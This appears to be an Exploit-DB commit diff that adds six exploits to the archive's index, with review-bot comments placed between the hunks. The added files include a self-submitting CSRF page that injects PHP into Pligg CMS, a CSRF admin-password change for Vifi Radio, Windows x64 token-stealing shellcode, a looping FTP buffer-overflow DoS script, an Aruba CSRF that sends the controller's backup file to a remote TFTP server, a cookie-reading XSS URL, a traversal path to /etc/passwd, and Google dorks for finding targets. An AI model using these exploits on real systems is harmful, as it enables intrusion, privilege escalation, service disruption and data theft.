DB: 2015-08-21

6 new exploits
Offensive Security 2015-08-21 05:02:09 +00:00
parent 1ef6c23cb9
commit 6dccd55e18
7 changed files with 251 additions and 1 deletions


@ -10740,7 +10740,7 @@ id,file,description,date,author,platform,type,port
11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0 11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0
11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0 11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0
11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0
11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,indoushka,php,webapps,0 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,indoushka,php,webapps,0
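Review bot: 11744 ("Duhok Forum 1.0 script Cross-Site Scripting Vulnerability") still lacks the " - " separator between product and vulnerability type that this hunk adds to 11742 to match 11739, 11741 and 11745; if this is a title-normalisation pass, fix 11744 in the same hunk so the csv stays consistent within the range being touched.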
@ -34204,3 +34204,9 @@ id,file,description,date,author,platform,type,port
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37889,platforms/linux/remote/37889.txt,"YingZhiPython Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0
37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80
37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
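Review bot: the author field for 37893 is written "_ Un_N0n _" with stray spaces and underscores, while the header of platforms/windows/dos/37893.py in this same commit gives "Un_N0n"; use one spelling so the csv row matches the file and searches by author find both. The id sequence also jumps from 37889 to 37891, so 37890 is not added here although the commit message says "6 new exploits" and six rows are added; confirm the gap is intentional (a withheld or removed entry) rather than a row dropped from the hunk.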


platforms/asp/webapps/37892.txt Executable file

@ -0,0 +1,51 @@
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Vifi Radio v1 - CSRF (Arbitrary Change Password) Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,
Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html
|~Official Demo : http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################
----------------------------------------------------------
PoC
----------------------------------------------------------
<html>
<body>
<form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
<input type="hidden" name="rutbe" value="1" />
<input type="hidden" name="djadi" value="0" />
<input type="hidden" name="resim" value="Vifi+Bili%FEim" />
<input type="hidden" name="firma" value="USERNAME" />
<input type="hidden" name="link" value="PASSWORD" />
<input type="hidden" name="sira" value="23" />
<input type="hidden" name="ilet" value="G%D6NDER" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
############################
"Admin Panel: /yonetim "
############################
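Review bot: the metadata is in the h4x0resec banner format rather than the "# Exploit Title / # Date / # Version / # Tested on" header that 37893.py, 37894.html and 37891.txt in this same commit use; add that header so the fields parse consistently across the archive. The title line ("CSRF (Arbitrary Change Password) Exploit") also does not match the files.csv description ("Vifi Radio v1 - CSRF Vulnerability"), and "Tested On : [L] Windows 7, Mozilla Firefox" names the client browser rather than the affected server build; state plainly what the POST to /yonetim/kullanici-kaydet.asp changes on the target and that no anti-CSRF token is checked, since that is what an administrator needs to assess impact and what the vendor fix has to address.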


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55685/info
An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.
YingZhiPython 1.9 is vulnerable; other versions may also be affected.
ftp://www.example.com/../../../../../../../private/etc/passwd
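Review bot: the csv title and the summary line promise both a directory traversal and an arbitrary file upload, but the only proof in this file is the single ftp:// traversal URL reading /private/etc/passwd; either drop "Arbitrary File Upload" from the 37889 description or cite where the upload is demonstrated, because the SecurityFocus BID 55685 reference alone does not show it. "YingZhiPython 1.9 is vulnerable" also gives a version that the csv row omits; carry 1.9 into the description for consistency with the other entries in this commit that name versions.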


@ -0,0 +1,56 @@
<!--
# Exploit Title: Pligg CMS Arbitrary Code Execution
# Google Dork: intext:"Made wtih Pligg CMS"
# Date: 2015/8/20
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://pligg.com
# Software Link:
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
# Version: 2.0.2
# Tested on: Kali , Iceweasel Browser
# CVE : N/A
# Contact : http://twitter.com/0xClay
# Mail : 0xclay@gmail.com
# Site : http://bhunter.ir
# Description :
# Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL V 2.0
# In Pligg CMS Panel In Adding Page Section Pligg CMS Allow To Admin Add
PHP Codes In {php} {/php} Tags
# A CSRF Vulnerabilty In Adding Page Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; Code You Can
Customize Exploit For Your Self .
# Exploit :
-->
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/pligg-cms/admin/submit_page.php"
method="POST" id="thisform" name="exploit">
<input type="hidden" name="page_title" id="page_title"
size="66"value="Hacked"/>
<input type="hidden" name="page_url" id="page_url" size="66"
value="Hacked"/>
<input type="hidden" name="page_keywords" id="page_keywords" size="66"
value="Hacked"/>
<input type="hidden" name="page_description" id="page_description"
size="66" value="Hacked"/>
<textarea type="hidden"id="textarea-1" name="page_content"
class="form-control page_content" rows="15"> {php}echo '<h1> Hacked </h1>';
{/php} &lt;/textarea&gt;
<input type="hidden" name="process" value="new_page" />
<input type="hidden" name="randkey" value="12412532" />
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
http://localhost/pligg-cms/page.php?page=Hacked
# Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))
-->
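Review bot: the randkey hidden field is a fixed literal (12412532) with no explanation; if Pligg's randkey is the per-session token guarding admin/submit_page.php, the description should say whether the check is absent in 2.0.2 or whether the value was captured from a live session, because that is the root cause a defender needs (the fix is to bind randkey to the session and reject mismatches). The description should also state whether the {php}{/php} tag feature is enabled by default or requires an admin setting, since that decides how many installations are exposed. Minor markup points: the closing tag on the page_content textarea is written HTML-encoded (&lt;/textarea&gt;), which the browser treats as text rather than a closing tag, and type="hidden" is not a textarea attribute.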


@ -0,0 +1,56 @@
;token stealing shellcode Win 2003 x64
;based on the widely available x86 version
;syntax for NASM
;Author: Csaba Fitzl, @theevilbit
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;important structures and offsets;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;kd> dt -r1 nt!_TEB
; +0x110 SystemReserved1 : [54] Ptr64 Void
;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
;kd> dt -r1 nt!_KTHREAD
; +0x048 ApcState : _KAPC_STATE
; +0x000 ApcListHead : [2] _LIST_ENTRY
; +0x020 Process : Ptr64 _KPROCESS
;kd> dt -r1 nt!_EPROCESS
; +0x0d8 UniqueProcessId : Ptr64 Void
; +0x0e0 ActiveProcessLinks : _LIST_ENTRY
; +0x000 Flink : Ptr64 _LIST_ENTRY
; +0x008 Blink : Ptr64 _LIST_ENTRY
; +0x160 Token : _EX_FAST_REF
; +0x000 Object : Ptr64 Void
; +0x000 RefCnt : Pos 0, 4 Bits
; +0x000 Value : Uint8B
BITS 64
global start
section .text
start:
mov rax, [gs:0x188] ;Get current ETHREAD in
mov rax, [rax+0x68] ;Get current EPROCESS address
mov rcx, rax ;Copy current EPROCESS address to RCX
find_system_process:
mov rax, [rax+0xe0] ;Next EPROCESS ActiveProcessLinks.Flink
sub rax, 0xe0 ;Go to the beginning of the EPROCESS structure
mov r9 , [rax+0xd8] ;Copy PID to R9
cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)
jnz short find_system_process ;If not SYSTEM got to next EPROCESS
stealing:
mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX
mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address
retn 0x10
;byte stream:
;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"
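Review bot: the structure comment block at the top does not match the code: it dumps nt!_TEB (+0x110 SystemReserved1 and an "undocumented" +0x078), yet the payload never touches the TEB; it reads the current thread from gs:0x188, which on x64 is the CurrentThread field of the KPRCB inside the KPCR. Replace the TEB dump with the structure actually read so the offsets can be verified against the stated Win2003 x64 target, and finish the truncated comment "Get current ETHREAD in" on the first instruction. It would also help to note that 0x68 is ApcState (+0x48) plus Process (+0x20) from the _KTHREAD dump, and that the final two instructions copy the whole _EX_FAST_REF Value, RefCnt bits included, rather than a referenced token pointer, so a comment should record that this is intentional. The byte stream does match the listing (59 bytes, as the csv title says), so nothing needs changing there.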

platforms/windows/dos/37893.py Executable file

@ -0,0 +1,41 @@
"""
********************************************************************************************
# Exploit Title: Valhala Honeypot Stack based BOF(Remote DOS)
# Date: 8/20/2015
# Exploit Author: Un_N0n
# Software Developer: Marcos Flavio Araujo Assuncao
# Software Link: http://sourceforge.net/projects/valhalahoneypot/
# Version: 1.8
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- Open 'honeypot.exe'.
2- Enter the IP of the machine on which this honeypot is running, in this case it is your own
machine i.e 127.0.0.1.
3- Run the script.
~ Software crashes.
[Code to crash honeypot]:
==============================================================
"""
import socket
while True:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP_ADDR",21))
s.send('USER test\r\n')
s.send('PASS test\r\n')
s.send('ABOR '+'A'*2000+'\r\n')
s.recv(1024)
s.send('ABOR '+'A'*5000+'\r\n')
s.recv(1024)
s.send('ABOR '+'A'*6000+'\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
==============================================================
**********************************************************************************************
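Review bot: the connect call uses the literal placeholder "IP_ADDR" while step 2 of the instructions tells the reader to enter the target IP, so either read the address from sys.argv or say in step 2 that the placeholder in the script must be edited. The "Tested on" line names Windows 7 x86 but not the Python version; the str-based send() calls only work under Python 2 (Python 3 requires bytes), so state the interpreter. From the defender's side, the distinguishing feature of the traffic is an ABOR command carrying an argument of 2000 bytes or more on port 21, which is the length an input-length check in the honeypot's FTP parser or an IDS signature should key on; the description would be more useful if it named that bound explicitly.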

platforms/xml/webapps/37891.txt Executable file

@ -0,0 +1,33 @@
# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen (itzik1 at gmail.com)
# Product web page: http://www.arubanetworks.com
# Affected Version: 6.4.2.8
# Tested on: Aruba7240, Ver 6.2.4.8
Summary
================
Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Arube Controller suffers from CSRF and XSS vulnerabilities.
Proof of Concept - CSRF
=========================
192.168.0.1 - Controller IP-Address
172.17.0.1 - Remote TFTP server
<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
That will send the flashbackup configuration file to a remote TFTP server.
Proof of Concept - XSS
=========================
https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
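Review bot: the header date "08/016/2015" is malformed, and "Affected Version: 6.4.2.8" disagrees with "Tested on: Aruba7240, Ver 6.2.4.8" (the digits are transposed in one of them); fix both so the csv row (6.4.2.8) and the advisory agree. "Arube Controller" in the summary should read "Aruba Controller". The CSRF section should also name the root cause it demonstrates: copyLocalFileToTftpServerWeb.xml performs a state-changing action (exporting flashbackup.tar.gz to a remote TFTP host) on a plain GET with no anti-CSRF token, which is why a 1x1 IMG tag suffices; the mitigation a defender needs is a token-protected POST for that endpoint and a restriction on TFTP export destinations. The XSS section likewise should say that the mode-title parameter is reflected into switch_mon.html without encoding. No vendor contact or fix status is recorded for either issue.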